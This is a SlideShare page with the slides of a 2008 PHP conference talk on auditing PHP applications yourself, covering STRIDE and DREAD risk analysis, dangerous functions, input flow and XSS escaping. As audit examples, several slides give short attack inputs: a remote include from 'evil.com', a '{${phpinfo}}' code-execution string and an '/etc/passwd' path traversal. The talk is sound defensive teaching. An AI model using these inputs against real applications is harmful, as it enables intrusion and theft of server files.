Do it-yourself-audits

2,594 views

Published on

0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
2,594
On SlideShare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
4
Comments
0
Likes
1
Embeds 0
No embeds

No notes for slide
  • \n
  • Formally i am the boss of stefan esser. I am not sure if he knows it, though. \n\n
  • \n
  • \n
  • \n
  • \n
  • \n
  • A database is 40.000 Bugs. Any database.\n
  • Message: The number one target is information theft. \n
  • Don‘t care about XSS, care about SQL injection first. \n
  • That‘s something that banking or insurance companies do. Security Experts for real world security do it, and so does the microsoft security development lifecycle.\n
  • So in six years time stefan would be able to tell marco „Look, there has been a bug“\n
  • What to audit: are there money issues? privacy issues? are children involved? sexual preferences? \n
  • Actually that‘s a term microsoft coined \n
  • Actually that‘s a term microsoft coined \n
  • Actually that‘s a term microsoft coined \n
  • Actually that‘s a term microsoft coined \n
  • Actually that‘s a term microsoft coined \n
  • Actually that‘s a term microsoft coined \n
  • Actually that‘s a term microsoft coined \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • Find easy to find vulnerabilities, \nidentify parts of code involved in highly critical workflows\n
  • Find easy to find vulnerabilities, \nidentify parts of code involved in highly critical workflows\n
  • White box audits\n
  • Basically you need an IDE for hacking! Like Zend IDE, PDT\n
  • \n
  • Parameter binding does just help 80% for sql injection!\n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • Do it-yourself-audits

    1. 1. Do-It-Yourself AuditsDutch PHP ConferenceAmsterdam 2008
    2. 2. The bald guy in the front
    3. 3. The bald guy in the front Johann-Peter Hartmann Full-time PHP Developer since 3.0.4 loves LAMP the great people, it‘s fun. Security is just fun CTO and Founder of Mayflower GmbH CEO of SektionEins GmbH
    4. 4. Our Business ModelMayflower GmbH : Create insecure Software
    5. 5. Our Business ModelMayflower GmbH : Create insecure SoftwareSektionEins GmbH : Fix it
    6. 6. Our Business ModelMayflower GmbH : Create insecure SoftwareSektionEins GmbH : Fix it= Get paid twice.
    7. 7. AgendaState of Security for PHPRisk AnalysisWhite Box AuditsInput flow analysisTools to help you
    8. 8. PHP and Security
    9. 9. 33 % 67 % Profit FunSource: Breach 2007
    10. 10. 3 % 3 % 1 %1 % 3 % 8 % 42 % 15 % Information theft Defacement Malware Unknown Fraud 23 % Blackmail Link Spam WormsSource: Breach 2007 Phishing Information Warfare
    11. 11. 2 % 3 % 2 % 2 % 20 % 3 % 3 % 3 % 8 % SQL Injection 17 % Information Disclosure 10 % Known Exploits XSS Missing Authentication 12 % Guessing of Logins/Sessions 15 % OS Code Execution Wrong configurations Missing Anti-Automation Denial Of Service RedirectSource: NSI 2006 Wrong Session-Timeout CSRF
    12. 12. Risk Analysis
    13. 13. Why do it, anyway?Best way: verify the whole applicationSecond best: audit the whole source codeAverage: 2000 LOC/DayMore than one year for a 500.000 LOC application.Marco just told me that he got a 3.000.000 LOCapplication
    14. 14. Better not audit everything.
    15. 15. Check Data Flows forSTRIDECheck every data exchange point for
    16. 16. Check Data Flows forSTRIDECheck every data exchange point for Spoofing ( Fake Referer, Stolen Session Ids)
    17. 17. Check Data Flows forSTRIDECheck every data exchange point for Spoofing ( Fake Referer, Stolen Session Ids) Tampering (XSS, CSRF)
    18. 18. Check Data Flows forSTRIDECheck every data exchange point for Spoofing ( Fake Referer, Stolen Session Ids) Tampering (XSS, CSRF) Repudiation (identy theft, identy coverage)
    19. 19. Check Data Flows forSTRIDECheck every data exchange point for Spoofing ( Fake Referer, Stolen Session Ids) Tampering (XSS, CSRF) Repudiation (identy theft, identy coverage) Information Disclosure (SQL-Injections, XSS, ...)
    20. 20. Check Data Flows forSTRIDECheck every data exchange point for Spoofing ( Fake Referer, Stolen Session Ids) Tampering (XSS, CSRF) Repudiation (identy theft, identy coverage) Information Disclosure (SQL-Injections, XSS, ...) Denial of service (Logout after 3 failed logins)
    21. 21. Check Data Flows forSTRIDECheck every data exchange point for Spoofing ( Fake Referer, Stolen Session Ids) Tampering (XSS, CSRF) Repudiation (identy theft, identy coverage) Information Disclosure (SQL-Injections, XSS, ...) Denial of service (Logout after 3 failed logins) Elevation of Privileges (Code executions ...)
    22. 22. How to Analyze Risks
    23. 23. How to Analyze Risks External Entities: Spoofing, Repudiation
    24. 24. How to Analyze Risks Processes: Spoofing, Tampering, Repudiation,Information Disclosure, DoS, Elevation of Privileges
    25. 25. How to Analyze RisksDatabase: Tampering, Information Disclosure, DoS
    26. 26. How to Analyze RisksData flow: Tampering, Information Disclosure, DoS
    27. 27. How to Analyze Risks
    28. 28. Now what‘s the absoluterisk?Check out the DREAD for every risk: Damage Potential Reproducability Exploitablitity Affected Users Discoverability
    29. 29. Where start auditing?
    30. 30. Where start auditing?risk = chance of attack * damage potential
    31. 31. Where start auditing?risk = chance of attack * damage potentialHigh risk example: SQL-Injection in a Login Form
    32. 32. Tools needed for manualSource Code AuditsSome people say: you just need „grep“A decent Code Browser with syntax highlightening good code navigationDynamic Code Analysis: Debugger with Step Thru Variable Introspection, Conditional Breakpoints
    33. 33. Critical Function Analysis Some functions are more dangerous than other methods. Every exploit class got its own set of functions think of: SQL Injections, Code Executions So just search for every critical function and check if the parameters are escaped correctly
    34. 34. SQL InjectionsFunctions: mysql_query, mysqli_query, pdo::query, ...Your own database abstraction layerWhat to check Are the parameters correctly escaped? Even numbers, sort orders and directions? Table and Column names?look out for proper escaping of values, column namesand sort orders etc
    35. 35. Code ExecutionsFunctions: eval(), create_function(), preg_replace with modifier e, usort, uasort, *_callback functionsWritten and included code: Templates in Smarty Cache dataLook out for: (external) variables in php-codeStrings can contain code executions! “{${phpinfo}}“
    36. 36. Code InclusionsFunctions(include|require)[_once]Local: include “/var/log/http/access.log“ with my refererRemote: include “http://evil.com/hack.gif“Other: “ftp://..“, “php://input...“, “data://...“allow_url_fopen does not protect against data and php!
    37. 37. Shell Executions Functions: shell_exec (BackTicks!), exec(), system(), popen(), passthru() mail()! binary name and arguments need to be escaped Check for existance of escape_shell_cmd and escape_shell_args
    38. 38. Information leakage Functions: fopen(), fread(), file(), ... Vulnerabilities: read local files containing database passwords read intranet URLs read local server configuration files Check for injection of „/../../etc/passwd%00“
    39. 39. Input Flow Analysis Check the way that variables take inside the application Faster than a critical function analysis PHP accepts every external variable by default The variables are from an untrusted environment As soon PHP got a taint mode, PHP does help you a lot
    40. 40. Input Flow Analysis $_GET, $_POST, $_COOKIE some $_SERVER variables! Don‘t trust $HTTP_HOST. register_globals makes it hard to follow Check if external variables or results of them are used in critical functions
    41. 41. XSS: Output EscapingcheckCheck for every place where data is delivered to theuserThere are 5 different versions of escaping for XSS
    42. 42. XSS: Output EscapingcheckCheck for every place where data is delivered to theuserThere are 5 different versions of escaping for XSS Text: htmlentities()
    43. 43. XSS: Output EscapingcheckCheck for every place where data is delivered to theuserThere are 5 different versions of escaping for XSS Text: htmlentities() Attributes: htmlspecialchars()
    44. 44. XSS: Output EscapingcheckCheck for every place where data is delivered to theuserThere are 5 different versions of escaping for XSS Text: htmlentities() Attributes: htmlspecialchars() URLs: urlencode()
    45. 45. XSS: Output EscapingcheckCheck for every place where data is delivered to theuserThere are 5 different versions of escaping for XSS Text: htmlentities() Attributes: htmlspecialchars() URLs: urlencode() JavaScript- and Stylesheet-Strings: addcslashes()
    46. 46. XSS: Output EscapingcheckCheck for every place where data is delivered to theuserThere are 5 different versions of escaping for XSS Text: htmlentities() Attributes: htmlspecialchars() URLs: urlencode() JavaScript- and Stylesheet-Strings: addcslashes() HTML: Whitelist-Filters like htmlpurifier
    47. 47. Tools for Static Analysis RATS: http://www.fortifysoftware.com/security- resources/rats.jsp finds simple bugs like TOCTOU PHP-SAT http://www.program-transformation.org/ PHP/PhpSat got a freely definable set of rules for security checks Armorize CodeSecure http://www.armorize.com/ HyperSource, Fortify
    48. 48. Other tools XSSS for automated XSS search http://www.sven.de/XSSS A lot of other web security scanners SPIDynamics WebInspect NStalker Chorizo does PHP gray box scanning .. a lot more
    49. 49. SummaryEven if you have time to do a full code review use riskanalysis to focusCode review:Use critical function analysis and output check or inputflow analysisTools can help you, but they don‘t do your job
    50. 50. Questions?
    51. 51. Questions? Contact me at: johann-peter.hartmann@sektioneins.de

    ×